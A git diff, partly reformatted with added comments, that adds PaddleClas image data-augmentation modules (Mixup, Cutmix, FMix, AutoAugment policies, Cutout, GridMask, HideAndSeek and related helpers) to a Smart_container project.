        super().__init__(*args, **kwargs)

    def __call__(self, img):
        return _to_ndarray(super().__call__(_to_pil(img)))


class TimmAutoAugment(RawTimmAutoAugment):
    """ TimmAutoAugment wrapper to auto fit different img types. """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def __call__(self, img):
        return _to_ndarray(super().__call__(_to_pil(img)))


# The header below belongs to the next file in this diff
# (ppcls/data/preprocess/batch_ops/batch_operators.py):
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +from __future__ import unicode_literals +import random + +import numpy as np + +from ppcls.utils import logger +from ppcls.data.preprocess.ops.fmix import sample_mask + + +class BatchOperator(object): + """ BatchOperator """ + + def __init__(self, *args, **kwargs): + pass + + def _unpack(self, batch): + """ _unpack """ + assert isinstance(batch, list), \ + 'batch should be a list filled with tuples (img, label)' + bs = len(batch) + assert bs > 0, 'size of the batch data should > 0' + #imgs, labels = list(zip(*batch)) + imgs = [] + labels = [] + for item in batch: + imgs.append(item[0]) + labels.append(item[1]) + return np.array(imgs), np.array(labels), bs + + def __call__(self, batch): + return batch + + +class MixupOperator(BatchOperator): + """ Mixup operator """ + + def __init__(self, alpha: float=1.): + """Build Mixup operator + + Args: + alpha (float, optional): The parameter alpha of mixup. Defaults to 1.. + + Raises: + Exception: The value of parameter is illegal. + """ + if alpha <= 0: + raise Exception( + f"Parameter \"alpha\" of Mixup should be greater than 0. \"alpha\": {alpha}." + ) + self._alpha = alpha + + def __call__(self, batch): + imgs, labels, bs = self._unpack(batch) + idx = np.random.permutation(bs) + lam = np.random.beta(self._alpha, self._alpha) + lams = np.array([lam] * bs, dtype=np.float32) + imgs = lam * imgs + (1 - lam) * imgs[idx] + return list(zip(imgs, labels, labels[idx], lams)) + + +class CutmixOperator(BatchOperator): + """ Cutmix operator """ + + def __init__(self, alpha=0.2): + """Build Cutmix operator + + Args: + alpha (float, optional): The parameter alpha of cutmix. Defaults to 0.2. + + Raises: + Exception: The value of parameter is illegal. + """ + if alpha <= 0: + raise Exception( + f"Parameter \"alpha\" of Cutmix should be greater than 0. \"alpha\": {alpha}." 
+ ) + self._alpha = alpha + + def _rand_bbox(self, size, lam): + """ _rand_bbox """ + w = size[2] + h = size[3] + cut_rat = np.sqrt(1. - lam) + cut_w = int(w * cut_rat) + cut_h = int(h * cut_rat) + + # uniform + cx = np.random.randint(w) + cy = np.random.randint(h) + + bbx1 = np.clip(cx - cut_w // 2, 0, w) + bby1 = np.clip(cy - cut_h // 2, 0, h) + bbx2 = np.clip(cx + cut_w // 2, 0, w) + bby2 = np.clip(cy + cut_h // 2, 0, h) + + return bbx1, bby1, bbx2, bby2 + + def __call__(self, batch): + imgs, labels, bs = self._unpack(batch) + idx = np.random.permutation(bs) + lam = np.random.beta(self._alpha, self._alpha) + + bbx1, bby1, bbx2, bby2 = self._rand_bbox(imgs.shape, lam) + imgs[:, :, bbx1:bbx2, bby1:bby2] = imgs[idx, :, bbx1:bbx2, bby1:bby2] + lam = 1 - (float(bbx2 - bbx1) * (bby2 - bby1) / + (imgs.shape[-2] * imgs.shape[-1])) + lams = np.array([lam] * bs, dtype=np.float32) + return list(zip(imgs, labels, labels[idx], lams)) + + +class FmixOperator(BatchOperator): + """ Fmix operator """ + + def __init__(self, alpha=1, decay_power=3, max_soft=0., reformulate=False): + self._alpha = alpha + self._decay_power = decay_power + self._max_soft = max_soft + self._reformulate = reformulate + + def __call__(self, batch): + imgs, labels, bs = self._unpack(batch) + idx = np.random.permutation(bs) + size = (imgs.shape[2], imgs.shape[3]) + lam, mask = sample_mask(self._alpha, self._decay_power, \ + size, self._max_soft, self._reformulate) + imgs = mask * imgs + (1 - mask) * imgs[idx] + return list(zip(imgs, labels, labels[idx], [lam] * bs)) + + +class OpSampler(object): + """ Sample a operator from """ + + def __init__(self, **op_dict): + """Build OpSampler + + Raises: + Exception: The parameter \"prob\" of operator(s) are be set error. + """ + if len(op_dict) < 1: + msg = f"ConfigWarning: No operator in \"OpSampler\". \"OpSampler\" has been skipped." 
+ + self.ops = {} + total_prob = 0 + for op_name in op_dict: + param = op_dict[op_name] + if "prob" not in param: + msg = f"ConfigWarning: Parameter \"prob\" should be set when use operator in \"OpSampler\". The operator \"{op_name}\"'s prob has been set \"0\"." + logger.warning(msg) + prob = param.pop("prob", 0) + total_prob += prob + op = eval(op_name)(**param) + self.ops.update({op: prob}) + + if total_prob > 1: + msg = f"ConfigError: The total prob of operators in \"OpSampler\" should be less 1." + logger.error(msg) + raise Exception(msg) + + # add "None Op" when total_prob < 1, "None Op" do nothing + self.ops[None] = 1 - total_prob + + def __call__(self, batch): + op = random.choices( + list(self.ops.keys()), weights=list(self.ops.values()), k=1)[0] + # return batch directly when None Op + return op(batch) if op else batch diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/__init__.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/__init__.py new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/__init__.py @@ -0,0 +1 @@ + diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/autoaugment.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/autoaugment.py new file mode 100644 index 0000000..330220a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/autoaugment.py @@ -0,0 +1,264 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/DeepVoltaire/AutoAugment/blob/master/autoaugment.py + +from PIL import Image, ImageEnhance, ImageOps +import numpy as np +import random + + +class ImageNetPolicy(object): + """ Randomly choose one of the best 24 Sub-policies on ImageNet. + + Example: + >>> policy = ImageNetPolicy() + >>> transformed = policy(image) + + Example as a PyTorch Transform: + >>> transform=transforms.Compose([ + >>> transforms.Resize(256), + >>> ImageNetPolicy(), + >>> transforms.ToTensor()]) + """ + + def __init__(self, fillcolor=(128, 128, 128)): + self.policies = [ + SubPolicy(0.4, "posterize", 8, 0.6, "rotate", 9, fillcolor), + SubPolicy(0.6, "solarize", 5, 0.6, "autocontrast", 5, fillcolor), + SubPolicy(0.8, "equalize", 8, 0.6, "equalize", 3, fillcolor), + SubPolicy(0.6, "posterize", 7, 0.6, "posterize", 6, fillcolor), + SubPolicy(0.4, "equalize", 7, 0.2, "solarize", 4, fillcolor), + SubPolicy(0.4, "equalize", 4, 0.8, "rotate", 8, fillcolor), + SubPolicy(0.6, "solarize", 3, 0.6, "equalize", 7, fillcolor), + SubPolicy(0.8, "posterize", 5, 1.0, "equalize", 2, fillcolor), + SubPolicy(0.2, "rotate", 3, 0.6, "solarize", 8, fillcolor), + SubPolicy(0.6, "equalize", 8, 0.4, "posterize", 6, fillcolor), + SubPolicy(0.8, "rotate", 8, 0.4, "color", 0, fillcolor), + SubPolicy(0.4, "rotate", 9, 0.6, "equalize", 2, fillcolor), + SubPolicy(0.0, "equalize", 7, 0.8, "equalize", 8, fillcolor), + SubPolicy(0.6, "invert", 4, 1.0, "equalize", 8, fillcolor), + SubPolicy(0.6, "color", 4, 1.0, "contrast", 8, fillcolor), + SubPolicy(0.8, "rotate", 8, 1.0, "color", 2, fillcolor), + SubPolicy(0.8, "color", 8, 0.8, "solarize", 7, fillcolor), + SubPolicy(0.4, "sharpness", 7, 0.6, "invert", 8, fillcolor), + SubPolicy(0.6, "shearX", 5, 1.0, "equalize", 9, fillcolor), + SubPolicy(0.4, "color", 0, 0.6, "equalize", 3, fillcolor), + SubPolicy(0.4, "equalize", 7, 0.2, 
"solarize", 4, fillcolor), + SubPolicy(0.6, "solarize", 5, 0.6, "autocontrast", 5, fillcolor), + SubPolicy(0.6, "invert", 4, 1.0, "equalize", 8, fillcolor), + SubPolicy(0.6, "color", 4, 1.0, "contrast", 8, fillcolor), + SubPolicy(0.8, "equalize", 8, 0.6, "equalize", 3, fillcolor) + ] + + def __call__(self, img, policy_idx=None): + if policy_idx is None or not isinstance(policy_idx, int): + policy_idx = random.randint(0, len(self.policies) - 1) + else: + policy_idx = policy_idx % len(self.policies) + return self.policies[policy_idx](img) + + def __repr__(self): + return "AutoAugment ImageNet Policy" + + +class CIFAR10Policy(object): + """ Randomly choose one of the best 25 Sub-policies on CIFAR10. + + Example: + >>> policy = CIFAR10Policy() + >>> transformed = policy(image) + + Example as a PyTorch Transform: + >>> transform=transforms.Compose([ + >>> transforms.Resize(256), + >>> CIFAR10Policy(), + >>> transforms.ToTensor()]) + """ + + def __init__(self, fillcolor=(128, 128, 128)): + self.policies = [ + SubPolicy(0.1, "invert", 7, 0.2, "contrast", 6, fillcolor), + SubPolicy(0.7, "rotate", 2, 0.3, "translateX", 9, fillcolor), + SubPolicy(0.8, "sharpness", 1, 0.9, "sharpness", 3, fillcolor), + SubPolicy(0.5, "shearY", 8, 0.7, "translateY", 9, fillcolor), + SubPolicy(0.5, "autocontrast", 8, 0.9, "equalize", 2, fillcolor), + SubPolicy(0.2, "shearY", 7, 0.3, "posterize", 7, fillcolor), + SubPolicy(0.4, "color", 3, 0.6, "brightness", 7, fillcolor), + SubPolicy(0.3, "sharpness", 9, 0.7, "brightness", 9, fillcolor), + SubPolicy(0.6, "equalize", 5, 0.5, "equalize", 1, fillcolor), + SubPolicy(0.6, "contrast", 7, 0.6, "sharpness", 5, fillcolor), + SubPolicy(0.7, "color", 7, 0.5, "translateX", 8, fillcolor), + SubPolicy(0.3, "equalize", 7, 0.4, "autocontrast", 8, fillcolor), + SubPolicy(0.4, "translateY", 3, 0.2, "sharpness", 6, fillcolor), + SubPolicy(0.9, "brightness", 6, 0.2, "color", 8, fillcolor), + SubPolicy(0.5, "solarize", 2, 0.0, "invert", 3, fillcolor), + 
class SVHNPolicy(object):
    """ Randomly choose one of the best 25 Sub-policies on SVHN.

    Example:
        >>> policy = SVHNPolicy()
        >>> transformed = policy(image)

    Example as a Transform in a pipeline:
        >>> transform = transforms.Compose([
        >>>     transforms.Resize(256),
        >>>     SVHNPolicy(),
        >>>     transforms.ToTensor()])
    """

    def __init__(self, fillcolor=(128, 128, 128)):
        # (p1, op1, magnitude_idx1, p2, op2, magnitude_idx2) per sub-policy.
        specs = [
            (0.9, "shearX", 4, 0.2, "invert", 3),
            (0.9, "shearY", 8, 0.7, "invert", 5),
            (0.6, "equalize", 5, 0.6, "solarize", 6),
            (0.9, "invert", 3, 0.6, "equalize", 3),
            (0.6, "equalize", 1, 0.9, "rotate", 3),
            (0.9, "shearX", 4, 0.8, "autocontrast", 3),
            (0.9, "shearY", 8, 0.4, "invert", 5),
            (0.9, "shearY", 5, 0.2, "solarize", 6),
            (0.9, "invert", 6, 0.8, "autocontrast", 1),
            (0.6, "equalize", 3, 0.9, "rotate", 3),
            (0.9, "shearX", 4, 0.3, "solarize", 3),
            (0.8, "shearY", 8, 0.7, "invert", 4),
            (0.9, "equalize", 5, 0.6, "translateY", 6),
            (0.9, "invert", 4, 0.6, "equalize", 7),
            (0.3, "contrast", 3, 0.8, "rotate", 4),
            (0.8, "invert", 5, 0.0, "translateY", 2),
            (0.7, "shearY", 6, 0.4, "solarize", 8),
            (0.6, "invert", 4, 0.8, "rotate", 4),
            (0.3, "shearY", 7, 0.9, "translateX", 3),
            (0.1, "shearX", 6, 0.6, "invert", 5),
            (0.7, "solarize", 2, 0.6, "translateY", 7),
            (0.8, "shearY", 4, 0.8, "invert", 8),
            (0.7, "shearX", 9, 0.8, "translateY", 3),
            (0.8, "shearY", 5, 0.7, "autocontrast", 3),
            (0.7, "shearX", 2, 0.1, "invert", 5),
        ]
        self.policies = [
            SubPolicy(p1, op1, m1, p2, op2, m2, fillcolor)
            for p1, op1, m1, p2, op2, m2 in specs
        ]

    def __call__(self, img, policy_idx=None):
        """Apply a random (or explicitly indexed) sub-policy to ``img``."""
        if isinstance(policy_idx, int):
            chosen = policy_idx % len(self.policies)
        else:
            chosen = random.randint(0, len(self.policies) - 1)
        return self.policies[chosen](img)

    def __repr__(self):
        return "AutoAugment SVHN Policy"
class SubPolicy(object):
    """A pair of (probability, operation, magnitude) augmentation steps.

    Each of the two operations is applied independently with its own
    probability; magnitudes are looked up in a 10-level table per op.
    """

    def __init__(self,
                 p1,
                 operation1,
                 magnitude_idx1,
                 p2,
                 operation2,
                 magnitude_idx2,
                 fillcolor=(128, 128, 128)):
        # Ten magnitude levels per operation.
        # Fix: `np.int` was removed in NumPy 1.24; the builtin `int` is the
        # documented replacement and is exactly what the alias resolved to.
        ranges = {
            "shearX": np.linspace(0, 0.3, 10),
            "shearY": np.linspace(0, 0.3, 10),
            "translateX": np.linspace(0, 150 / 331, 10),
            "translateY": np.linspace(0, 150 / 331, 10),
            "rotate": np.linspace(0, 30, 10),
            "color": np.linspace(0.0, 0.9, 10),
            "posterize": np.round(np.linspace(8, 4, 10), 0).astype(int),
            "solarize": np.linspace(256, 0, 10),
            "contrast": np.linspace(0.0, 0.9, 10),
            "sharpness": np.linspace(0.0, 0.9, 10),
            "brightness": np.linspace(0.0, 0.9, 10),
            "autocontrast": [0] * 10,
            "equalize": [0] * 10,
            "invert": [0] * 10
        }

        # from https://stackoverflow.com/questions/5252170/specify-image-filling-color-when-rotating-in-python-with-pil-and-setting-expand
        def rotate_with_fill(img, magnitude):
            # NOTE(review): fills with mid-grey (128,)*4 rather than
            # `fillcolor`; kept as-is to match the reference implementation.
            rot = img.convert("RGBA").rotate(magnitude)
            return Image.composite(rot,
                                   Image.new("RGBA", rot.size, (128, ) * 4),
                                   rot).convert(img.mode)

        # Signs of shear/translate/enhance magnitudes are randomized per call.
        func = {
            "shearX": lambda img, magnitude: img.transform(
                img.size, Image.AFFINE, (1, magnitude * random.choice([-1, 1]), 0, 0, 1, 0),
                Image.BICUBIC, fillcolor=fillcolor),
            "shearY": lambda img, magnitude: img.transform(
                img.size, Image.AFFINE, (1, 0, 0, magnitude * random.choice([-1, 1]), 1, 0),
                Image.BICUBIC, fillcolor=fillcolor),
            "translateX": lambda img, magnitude: img.transform(
                img.size, Image.AFFINE, (1, 0, magnitude * img.size[0] * random.choice([-1, 1]), 0, 1, 0),
                fillcolor=fillcolor),
            "translateY": lambda img, magnitude: img.transform(
                img.size, Image.AFFINE, (1, 0, 0, 0, 1, magnitude * img.size[1] * random.choice([-1, 1])),
                fillcolor=fillcolor),
            "rotate": lambda img, magnitude: rotate_with_fill(img, magnitude),
            "color": lambda img, magnitude: ImageEnhance.Color(img).enhance(1 + magnitude * random.choice([-1, 1])),
            "posterize": lambda img, magnitude: ImageOps.posterize(img, magnitude),
            "solarize": lambda img, magnitude: ImageOps.solarize(img, magnitude),
            "contrast": lambda img, magnitude: ImageEnhance.Contrast(img).enhance(
                1 + magnitude * random.choice([-1, 1])),
            "sharpness": lambda img, magnitude: ImageEnhance.Sharpness(img).enhance(
                1 + magnitude * random.choice([-1, 1])),
            "brightness": lambda img, magnitude: ImageEnhance.Brightness(img).enhance(
                1 + magnitude * random.choice([-1, 1])),
            "autocontrast": lambda img, magnitude: ImageOps.autocontrast(img),
            "equalize": lambda img, magnitude: ImageOps.equalize(img),
            "invert": lambda img, magnitude: ImageOps.invert(img)
        }

        self.p1 = p1
        self.operation1 = func[operation1]
        self.magnitude1 = ranges[operation1][magnitude_idx1]
        self.p2 = p2
        self.operation2 = func[operation2]
        self.magnitude2 = ranges[operation2][magnitude_idx2]

    def __call__(self, img):
        """Apply op1 with prob p1, then op2 with prob p2; return the image."""
        if random.random() < self.p1:
            img = self.operation1(img, self.magnitude1)
        if random.random() < self.p2:
            img = self.operation2(img, self.magnitude2)
        return img
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/uoguelph-mlrg/Cutout + +import numpy as np +import random + + +class Cutout(object): + def __init__(self, n_holes=1, length=112): + self.n_holes = n_holes + self.length = length + + def __call__(self, img): + """ cutout_image """ + h, w = img.shape[:2] + mask = np.ones((h, w), np.float32) + + for n in range(self.n_holes): + y = np.random.randint(h) + x = np.random.randint(w) + + y1 = np.clip(y - self.length // 2, 0, h) + y2 = np.clip(y + self.length // 2, 0, h) + x1 = np.clip(x - self.length // 2, 0, w) + x2 = np.clip(x + self.length // 2, 0, w) + + img[y1:y2, x1:x2] = 0 + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/fmix.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/fmix.py new file mode 100644 index 0000000..dc2ef91 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/fmix.py @@ -0,0 +1,217 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import math +import random + +import numpy as np +from scipy.stats import beta + + +def fftfreqnd(h, w=None, z=None): + """ Get bin values for discrete fourier transform of size (h, w, z) + + :param h: Required, first dimension size + :param w: Optional, second dimension size + :param z: Optional, third dimension size + """ + fz = fx = 0 + fy = np.fft.fftfreq(h) + + if w is not None: + fy = np.expand_dims(fy, -1) + + if w % 2 == 1: + fx = np.fft.fftfreq(w)[:w // 2 + 2] + else: + fx = np.fft.fftfreq(w)[:w // 2 + 1] + + if z is not None: + fy = np.expand_dims(fy, -1) + if z % 2 == 1: + fz = np.fft.fftfreq(z)[:, None] + else: + fz = np.fft.fftfreq(z)[:, None] + + return np.sqrt(fx * fx + fy * fy + fz * fz) + + +def get_spectrum(freqs, decay_power, ch, h, w=0, z=0): + """ Samples a fourier image with given size and frequencies decayed by decay power + + :param freqs: Bin values for the discrete fourier transform + :param decay_power: Decay power for frequency decay prop 1/f**d + :param ch: Number of channels for the resulting mask + :param h: Required, first dimension size + :param w: Optional, second dimension size + :param z: Optional, third dimension size + """ + scale = np.ones(1) / (np.maximum(freqs, np.array([1. 
def binarise_mask(mask, lam, in_shape, max_soft=0.0):
    """ Binarises a given low frequency image such that it has mean lambda.

    :param mask: Low frequency image, usually the result of `make_low_freq_image`
    :param lam: Mean value of final mask
    :param in_shape: Shape of inputs
    :param max_soft: Softening value between 0 and 0.5 which smooths hard edges in the mask.
    :return: mask reshaped to (1, 1, in_shape[0], in_shape[1])
    """
    flat = mask.reshape(-1)
    # Pixel indices ordered from highest to lowest intensity.
    order = flat.argsort()[::-1]

    # Round lam * size up or down at random so the expectation is unbiased.
    n_ones = lam * flat.size
    num = math.floor(n_ones) if random.random() <= 0.5 else math.ceil(n_ones)

    # Cap the softening so the soft band cannot spill past either extreme.
    eff_soft = max_soft
    if max_soft > lam or max_soft > (1 - lam):
        eff_soft = min(lam, 1 - lam)

    soft = int(flat.size * eff_soft)
    num_low = int(num - soft)
    num_high = int(num + soft)

    # Brightest pixels become 1, dimmest become 0, with a linear ramp between.
    flat[order[:num_high]] = 1
    flat[order[num_low:]] = 0
    flat[order[num_low:num_high]] = np.linspace(1, 0, (num_high - num_low))

    return flat.reshape((1, 1, in_shape[0], in_shape[1]))
+ :return: mixed input, permutation indices, lambda value of mix, + """ + lam, mask = sample_mask(alpha, decay_power, shape, max_soft, reformulate) + index = np.random.permutation(x.shape[0]) + + x1, x2 = x * mask, x[index] * (1 - mask) + return x1 + x2, index, lam + + +class FMixBase: + """ FMix augmentation + + Args: + decay_power (float): Decay power for frequency decay prop 1/f**d + alpha (float): Alpha value for beta distribution from which to sample mean of mask + size ([int] | [int, int] | [int, int, int]): Shape of desired mask, list up to 3 dims + max_soft (float): Softening value between 0 and 0.5 which smooths hard edges in the mask. + reformulate (bool): If True, uses the reformulation of [1]. + """ + + def __init__(self, + decay_power=3, + alpha=1, + size=(32, 32), + max_soft=0.0, + reformulate=False): + super().__init__() + self.decay_power = decay_power + self.reformulate = reformulate + self.size = size + self.alpha = alpha + self.max_soft = max_soft + self.index = None + self.lam = None + + def __call__(self, x): + raise NotImplementedError + + def loss(self, *args, **kwargs): + raise NotImplementedError diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/functional.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/functional.py new file mode 100644 index 0000000..9f1369e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/functional.py @@ -0,0 +1,138 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +# encoding: utf-8 + +import numpy as np +from PIL import Image, ImageOps, ImageEnhance + + + +def int_parameter(level, maxval): + """Helper function to scale `val` between 0 and maxval . + Args: + level: Level of the operation that will be between [0, `PARAMETER_MAX`]. + maxval: Maximum value that the operation can have. This will be scaled to + level/PARAMETER_MAX. + Returns: + An int that results from scaling `maxval` according to `level`. + """ + return int(level * maxval / 10) + + +def float_parameter(level, maxval): + """Helper function to scale `val` between 0 and maxval. + Args: + level: Level of the operation that will be between [0, `PARAMETER_MAX`]. + maxval: Maximum value that the operation can have. This will be scaled to + level/PARAMETER_MAX. + Returns: + A float that results from scaling `maxval` according to `level`. + """ + return float(level) * maxval / 10. + + +def sample_level(n): + return np.random.uniform(low=0.1, high=n) + + +def autocontrast(pil_img, *args): + return ImageOps.autocontrast(pil_img) + + +def equalize(pil_img, *args): + return ImageOps.equalize(pil_img) + + +def posterize(pil_img, level, *args): + level = int_parameter(sample_level(level), 4) + return ImageOps.posterize(pil_img, 4 - level) + + +def rotate(pil_img, level, *args): + degrees = int_parameter(sample_level(level), 30) + if np.random.uniform() > 0.5: + degrees = -degrees + return pil_img.rotate(degrees, resample=Image.BILINEAR) + + +def solarize(pil_img, level, *args): + level = int_parameter(sample_level(level), 256) + return ImageOps.solarize(pil_img, 256 - level) + + +def shear_x(pil_img, level): + level = float_parameter(sample_level(level), 0.3) + if np.random.uniform() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, level, 0, 0, 1, 0), + resample=Image.BILINEAR) + + +def shear_y(pil_img, level): + level = 
float_parameter(sample_level(level), 0.3) + if np.random.uniform() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, 0, 0, level, 1, 0), + resample=Image.BILINEAR) + + +def translate_x(pil_img, level): + level = int_parameter(sample_level(level), pil_img.size[0] / 3) + if np.random.random() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, 0, level, 0, 1, 0), + resample=Image.BILINEAR) + + +def translate_y(pil_img, level): + level = int_parameter(sample_level(level), pil_img.size[1] / 3) + if np.random.random() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, 0, 0, 0, 1, level), + resample=Image.BILINEAR) + + +# operation that overlaps with ImageNet-C's test set +def color(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Color(pil_img).enhance(level) + + +# operation that overlaps with ImageNet-C's test set +def contrast(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Contrast(pil_img).enhance(level) + + +# operation that overlaps with ImageNet-C's test set +def brightness(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Brightness(pil_img).enhance(level) + + +# operation that overlaps with ImageNet-C's test set +def sharpness(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Sharpness(pil_img).enhance(level) + + +augmentations = [ + autocontrast, equalize, posterize, rotate, solarize, shear_x, shear_y, + translate_x, translate_y +] diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/grid.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/grid.py new file mode 100644 index 0000000..6f0b2dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/grid.py @@ -0,0 +1,89 @@ +# Copyright (c) 2021 PaddlePaddle 
class GridMask(object):
    """GridMask augmentation: zero out a rotated regular grid of bands.

    Based on https://github.com/akuxcw/GridMask.  The apply-probability is
    warmed up linearly from 0 to ``prob`` using the module-level
    CURR_EPOCH / NUM_EPOCHS counters.
    """

    def __init__(self, d1=96, d2=224, rotate=1, ratio=0.5, mode=0, prob=1.):
        # d1 / d2: bounds for the random grid period d (randint(d1, d2)).
        self.d1 = d1
        self.d2 = d2
        # rotate: exclusive upper bound of the random rotation in degrees
        # (with the default 1, the rotation is always 0 degrees).
        self.rotate = rotate
        # ratio: fraction of each period that is zeroed out.
        self.ratio = ratio
        # mode 0: zero the grid bands; mode 1: use the inverted mask.
        self.mode = mode
        self.st_prob = prob
        self.prob = prob
        # Last probability used; sentinel -1 forces a log on first call.
        self.last_prob = -1

    def set_prob(self):
        # Warm up the probability linearly with the global epoch counter.
        global CURR_EPOCH
        global NUM_EPOCHS
        self.prob = self.st_prob * min(1, 1.0 * CURR_EPOCH / NUM_EPOCHS)

    def __call__(self, img):
        """Apply GridMask to ``img`` (C, H, W ndarray) and return the result."""
        self.set_prob()
        # Log only when the warmed-up probability actually changed.
        if abs(self.last_prob - self.prob) > 1e-10:
            global CURR_EPOCH
            global NUM_EPOCHS
            print(
                "self.prob is updated, self.prob={}, CURR_EPOCH: {}, NUM_EPOCHS: {}".
                format(self.prob, CURR_EPOCH, NUM_EPOCHS))
            self.last_prob = self.prob
        if np.random.rand() > self.prob:
            return img
        _, h, w = img.shape
        # Build the mask on a 1.5x canvas so a rotated crop still covers the image.
        hh = int(1.5 * h)
        ww = int(1.5 * w)
        d = np.random.randint(self.d1, self.d2)
        # Band width: ratio of the period, rounded to nearest int.
        self.l = int(d * self.ratio + 0.5)
        mask = np.ones((hh, ww), np.float32)
        # Random phase of the grid in each direction.
        st_h = np.random.randint(d)
        st_w = np.random.randint(d)
        # Zero horizontal bands of width self.l every d rows ...
        for i in range(-1, hh // d + 1):
            s = d * i + st_h
            t = s + self.l
            s = max(min(s, hh), 0)
            t = max(min(t, hh), 0)
            mask[s:t, :] *= 0
        # ... and vertical bands every d columns.
        for i in range(-1, ww // d + 1):
            s = d * i + st_w
            t = s + self.l
            s = max(min(s, ww), 0)
            t = max(min(t, ww), 0)
            mask[:, s:t] *= 0
        r = np.random.randint(self.rotate)
        mask = Image.fromarray(np.uint8(mask))
        mask = mask.rotate(r)
        mask = np.asarray(mask)
        # Central h x w crop of the oversized, rotated mask.
        mask = mask[(hh - h) // 2:(hh - h) // 2 + h, (ww - w) // 2:(ww - w) //
                    2 + w]

        if self.mode == 1:
            mask = 1 - mask

        # Broadcast the (1, H, W) mask over the channel axis.
        mask = np.expand_dims(mask, axis=0)
        img = (img * mask).astype(img.dtype)

        return img
+# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/kkanshul/Hide-and-Seek + +import numpy as np +import random + + +class HideAndSeek(object): + def __init__(self): + # possible grid size, 0 means no hiding + self.grid_sizes = [0, 16, 32, 44, 56] + # hiding probability + self.hide_prob = 0.5 + + def __call__(self, img): + # randomly choose one grid size + grid_size = np.random.choice(self.grid_sizes) + + _, h, w = img.shape + + # hide the patches + if grid_size == 0: + return img + for x in range(0, w, grid_size): + for y in range(0, h, grid_size): + x_end = min(w, x + grid_size) + y_end = min(h, y + grid_size) + if (random.random() <= self.hide_prob): + img[:, x:x_end, y:y_end] = 0 + + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/operators.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/operators.py new file mode 100644 index 0000000..e46823d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/operators.py @@ -0,0 +1,386 @@ +""" +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
